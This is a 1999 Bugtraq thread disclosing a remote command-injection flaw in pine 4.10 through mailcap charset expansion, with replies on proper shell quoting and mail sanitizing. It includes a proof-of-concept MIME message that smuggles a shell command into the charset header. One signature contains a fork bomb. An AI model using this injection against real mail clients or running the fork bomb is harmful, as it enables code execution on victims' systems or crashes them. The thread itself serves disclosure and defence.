Date: Mon, 8 Feb 1999 00:22:17 +0100 From: Michal Zalewski To: BUGTRAQ@netspace.org Subject: remote exploit on pine 4.10 - neverending story? Affected systems: ----------------- Any Un*x system running 'pine' up to version 4.10 (latest). Compromise: ----------- Remote execution of arbitrary code when message is viewed. Details: -------- About five months ago, I reported vunerability in metamail package used with pine. I also noticed that '`' character is incorrectly expanded by pine. Problem has been ignored (probably noone understood what I am talking about?;-). But no matter. An exception from /etc/mailcap: text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput Impact: ------- And now, ladies and gentelmen - my old bug, reinvented. Usually, above mailcap line is expanded to: [...] execve (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1) Hmm, but take a look at this message: ************************** MIME MESSAGE FOLLOWS ************************** >From: Attacker To: Victim Subject: Happy birthday ... MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319" --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset='US-ASCII' Make a wish... --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c" Content-Transfer-Encoding: BASE64 Content-Description: wish Content-Disposition: attachment; filename="wish.c" ...it could be your last. *************************** MIME MESSAGE ENDS *************************** The result is: [...] execve (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1) ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is executed when message is viewed. Fix: ---- Well, it's the second time I report problems with ` in headers. Maybe pine developers should wait a little longer ;-) _______________________________________________________________________ Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM] [lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] ------------------------------------------------------------------------- Date: Mon, 8 Feb 1999 18:13:53 +0100 From: Thomas Roessler To: BUGTRAQ@netspace.org Subject: Re: remote exploit on pine 4.10 - neverending story? This bug exhibits a general mailcap design problem, actually some apparent lack of clarity in RFC 1524: The mailcap format specification does not define where quoting takes place. As a result, users tend to do quoting manually using constructs like "%..." or '%...'. Software tends not to do _any_ quoting of its own. Why this means begging for desaster is obvious: Attackers can construct strings with appropriate shell metacharacters to trick users into executing arbitrary shell commands - just like Michael demonstrated for this special case. The only proper solution is that users MUST NOT perform any quoting on their own in mailcap files, and that software MUST perform proper shell quoting when expanding the %{something} strings. "Proper shell quoting" means to put the complete string into single quotes and to replace any ' inside the string by the sequence of characters '\''. (Note that this is already in some Unix programming FAQ.) "Simply" trying to escape or wipe out shell metacharacters will also be a recipe for problems. Think about certain bash versions' handling of (as far as I recall) \xff as a word separator. tlr -- Thomas Roessler · 74a353cc0b19 · dg1ktr · http://home.pages.de/~roessler/ 2048/CE6AC6C1 · 4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1 ------------------------------------------------------------------------- Date: Mon, 8 Feb 1999 09:25:11 -0800 From: John D. Hardin To: BUGTRAQ@netspace.org Subject: Re: remote exploit on pine 4.10 - neverending story? Okay, I have added `` -> " conversion to my procmail MIME sanitizer. Michal, is that the only way to exploit this? Or should there be ` -> ' conversion as well? See http://www.wolfenet.com/~jhardin/procmail-security.html for details. -- John Hardin KA7OHZ jhardin@wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76 ----------------------------------------------------------------------- Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [ OK ] ----------------------------------------------------------------------- 101 days until Star Wars episode I